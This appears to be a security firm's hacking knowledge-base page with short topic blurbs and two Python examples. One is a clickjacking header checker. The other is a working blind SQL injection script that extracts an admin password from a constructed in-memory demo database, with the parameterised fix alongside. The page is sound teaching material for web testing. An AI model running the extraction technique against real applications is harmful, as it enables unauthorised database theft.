Knowledge base: Hacking

In this section we share our knowledge about hacking.


Blind SQL Injection

With a blind SQL injection the application never shows the query results directly, yet an attacker can still extract data from the database: each request is turned into a yes/no question, and the answer is read from a side channel such as a difference in the page content or in the response time.
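
The extraction loop described above, as an added example that is not part of the original article: a hypothetical product-lookup endpoint backed by an in-memory SQLite database concatenates its `id` parameter into the query and only reports whether a row was found. That boolean is enough to recover the admin password character by character; a binary search over printable ASCII keeps it to about seven requests per character. The table contents, the secret and the endpoint name are constructed for the demo, and `product_exists_safe` shows the parameterised fix beside the vulnerable function.

```python
import sqlite3

# Constructed sample data for the demo; not from the original article.
ADMIN_PASSWORD = "s3cr3t!"


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(1, "keyboard"), (2, "mouse")])
    conn.execute("INSERT INTO users VALUES ('admin', ?)", (ADMIN_PASSWORD,))
    conn.commit()
    return conn


CONN = build_db()
QUERIES_SENT = 0


def product_exists(product_id: str) -> bool:
    """Hypothetical vulnerable endpoint: the id parameter is concatenated
    into the SQL, but the caller only learns whether a row was found,
    never the row itself (a 'found' / 'not found' page)."""
    global QUERIES_SENT
    QUERIES_SENT += 1
    sql = f"SELECT name FROM products WHERE id = {product_id}"
    try:
        return CONN.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a broken query looks like 'not found'


def product_exists_safe(product_id: str) -> bool:
    """The fix: a bound parameter, so the input is a value and never SQL."""
    try:
        pid = int(product_id)
    except ValueError:
        return False
    row = CONN.execute("SELECT name FROM products WHERE id = ?", (pid,)).fetchone()
    return row is not None


def oracle(condition: str) -> bool:
    """Turn the endpoint into a yes/no oracle: product 1 exists, so the
    page says 'found' exactly when the injected condition is true."""
    return product_exists(f"1 AND ({condition})")


SECRET_EXPR = "(SELECT password FROM users WHERE username = 'admin')"


def extract_secret(max_len: int = 64) -> str:
    """Recover the admin password one character at a time. Each character
    is located by binary search over printable ASCII (32..126), so it costs
    about 7 oracle queries instead of up to 95 guesses."""
    recovered = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"LENGTH({SECRET_EXPR}) >= {pos}"):
            break  # ran past the end of the secret
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite: SUBSTR is 1-indexed, UNICODE gives the code point
            if oracle(f"UNICODE(SUBSTR({SECRET_EXPR}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    secret = extract_secret()
    print(f"recovered {secret!r} with {QUERIES_SENT} requests")
```

A time-based variant works the same way, with the oracle reading the response delay instead of the page content; the search logic does not change, only the side channel. The same parameterised query in `product_exists_safe` closes both.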

What is Server-side request forgery (SSRF)?

Server-side request forgery is an attack in which the server is tricked into making a request it should not make.

CVE-2016-7941 – XSS in Netgear ProSAFE switches

A tale about the discovery of CVE-2016-7941, an XSS vulnerability in Netgear ProSAFE switches, which was discovered quite some time ago.

Entity injection

Entity injection attacks (XXE) target applications that parse XML and can lead to data leaks. They are possible when the XML parser is incorrectly configured and resolves external entities supplied by the attacker.

Upgrade NetCat shell

By default, a NetCat shell is limited and error-prone: there is no job control or tab completion, and a stray Ctrl-C closes the connection. With a few simple commands it can be upgraded to a fully interactive shell.

What is clickjacking?

Clickjacking, sometimes called "UI redressing", is a way of stealing a well-placed click from a victim: the attacker loads the target page in an invisible frame and lures the user into clicking on it. The goal is to make the user perform an action, without their knowledge or consent, that benefits the attacker. Clickjacking is usually combined with social engineering and other security flaws.
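
Whether a page can be framed at all is decided by two response headers, and checking them is the first thing to do when testing for clickjacking. The function below is an added example, not code from the original article: it models the browser's rules for `X-Frame-Options` and the CSP `frame-ancestors` directive (which takes precedence when both are present) and reports whether a given framing origin would be allowed. It is a simplified model rather than a full CSP source-expression parser, and the header values and origins are constructed for the demo.

```python
from urllib.parse import urlsplit


def origin_of(url: str) -> tuple:
    """Return (scheme, host[:port]) of a URL, lower-cased."""
    p = urlsplit(url)
    return p.scheme.lower(), p.netloc.lower()


def frame_ancestors(csp: str):
    """Return the frame-ancestors source list from a CSP header, or None."""
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]]
    return None


def source_allows(src: str, page: tuple, framer: tuple) -> bool:
    """Simplified match of one frame-ancestors source against the framer origin."""
    if src == "'none'":
        return False
    if src == "*":
        return True
    if src == "'self'":
        return framer == page
    if src.endswith(":") and "/" not in src:   # scheme source, e.g. https:
        return framer[0] == src[:-1]
    if "://" in src:                            # host source with scheme
        scheme, host = src.split("://", 1)
    else:                                       # scheme-less host source
        scheme, host = None, src
    host = host.rstrip("/")
    if scheme and scheme != framer[0]:
        return False
    if host.startswith("*."):
        return framer[1].endswith(host[1:])    # "*.example.com" -> ".example.com"
    return framer[1] == host


def framing_allowed(headers: dict, page_url: str, framer_url: str) -> tuple:
    """Decide whether framer_url may embed page_url given its response headers.

    Returns (allowed, reason). CSP frame-ancestors wins over X-Frame-Options;
    the obsolete ALLOW-FROM value is ignored by current browsers, i.e. it
    offers no protection at all.
    """
    h = {k.lower(): v for k, v in headers.items()}
    page, framer = origin_of(page_url), origin_of(framer_url)

    sources = frame_ancestors(h.get("content-security-policy", ""))
    if sources is not None:
        allowed = any(source_allows(s, page, framer) for s in sources)
        return allowed, "csp frame-ancestors"

    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False, "x-frame-options DENY"
    if xfo == "SAMEORIGIN":
        return framer == page, "x-frame-options SAMEORIGIN"
    if xfo.startswith("ALLOW-FROM"):
        return True, "ALLOW-FROM is obsolete and ignored: no protection"
    return True, "no anti-framing header: page is frameable"


if __name__ == "__main__":
    # Constructed headers as they might be captured from a target.
    page = "https://bank.example/transfer"
    cases = {
        "none":  {},
        "deny":  {"X-Frame-Options": "DENY"},
        "csp":   {"X-Frame-Options": "DENY",
                  "Content-Security-Policy":
                  "default-src 'self'; frame-ancestors 'self' https://*.partner.example"},
    }
    for name, hdrs in cases.items():
        print(name, framing_allowed(hdrs, page, "https://evil.example/"))
```

In a test report, "no anti-framing header" and "ALLOW-FROM only" are both findings; `frame-ancestors 'none'` or `'self'` plus `X-Frame-Options: DENY`/`SAMEORIGIN` for older browsers is the fix.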

OWASP top 10

OWASP is a non-profit foundation dedicated to improving the security of software. It periodically publishes the OWASP Top 10, a list of the ten most critical security risks to web applications. This list gives you an idea of what CyberAnt pays attention to when we test your website.

The risk of .DS_Store

macOS creates a hidden file called .DS_Store in some folders. In this article we explain the risks when this file accidentally ends up in the wrong place, such as on a public web server where it reveals the names of the other files in that directory, and how this can be prevented.